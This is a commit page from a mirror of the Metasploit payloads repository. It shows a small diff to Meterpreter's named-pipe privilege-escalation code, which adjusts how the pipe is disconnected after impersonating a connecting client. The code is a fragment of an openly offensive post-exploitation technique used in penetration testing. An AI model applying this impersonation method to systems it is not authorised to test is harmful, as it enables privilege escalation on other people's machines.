github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2024-11-20 14:39:22 +01:00
Code Releases Activity

Land #438, Disconnect the named pipe and break after the impersonation callback

Browse Source 
Merge branch 'land-438' into upstream-master
This commit is contained in:
bwatters-r7 2020-10-07 14:51:36 -05:00
commit b1c8376459
No known key found for this signature in database
GPG Key ID: ECC0F0A52E65F268
1 changed files with 6 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
c/meterpreter/source/extensions/priv/namedpipe.c
View File

@ -35,6 +35,7 @@ DWORD THREADCALL elevate_namedpipe_thread(THREAD * thread)
char * cpPipeName = NULL;
BYTE bMessage[128] = {0};
DWORD dwBytes = 0;
BOOL bImpersonated = FALSE;
PPRIV_POST_IMPERSONATION pPostImpersonation = NULL;
do {
@ -85,11 +86,14 @@ DWORD THREADCALL elevate_namedpipe_thread(THREAD * thread)
// we can't impersonate a client until we have performed a read on the pipe...
if (!ReadFile(hPipe, &bMessage, 1, &dwBytes, NULL)) {
DisconnectNamedPipe(hPipe);
CONTINUE_ON_ERROR("[ELEVATE] pipethread. ReadFile failed");
}
// impersonate the client!
if (!ImpersonateNamedPipeClient(hPipe)) {
bImpersonated = ImpersonateNamedPipeClient(hPipe);
DisconnectNamedPipe(hPipe);
if (!bImpersonated) {
CONTINUE_ON_ERROR("[ELEVATE] elevate_namedpipe_thread. ImpersonateNamedPipeClient failed");
}
@ -98,7 +102,7 @@ DWORD THREADCALL elevate_namedpipe_thread(THREAD * thread)
dwResult = pPostImpersonation->pCallback(pPostImpersonation->pCallbackParam);
if (dwResult != ERROR_SUCCESS) {
RevertToSelf();
CONTINUE_ON_ERROR("[ELEVATE] elevate_namedpipe_thread. the post impersonation callback failed");
BREAK_ON_ERROR("[ELEVATE] elevate_namedpipe_thread. the post impersonation callback failed");
}
}
else {
@ -109,7 +113,6 @@ DWORD THREADCALL elevate_namedpipe_thread(THREAD * thread)
} while (0);
if (hPipe) {
DisconnectNamedPipe(hPipe);
CLOSE_HANDLE(hPipe);
}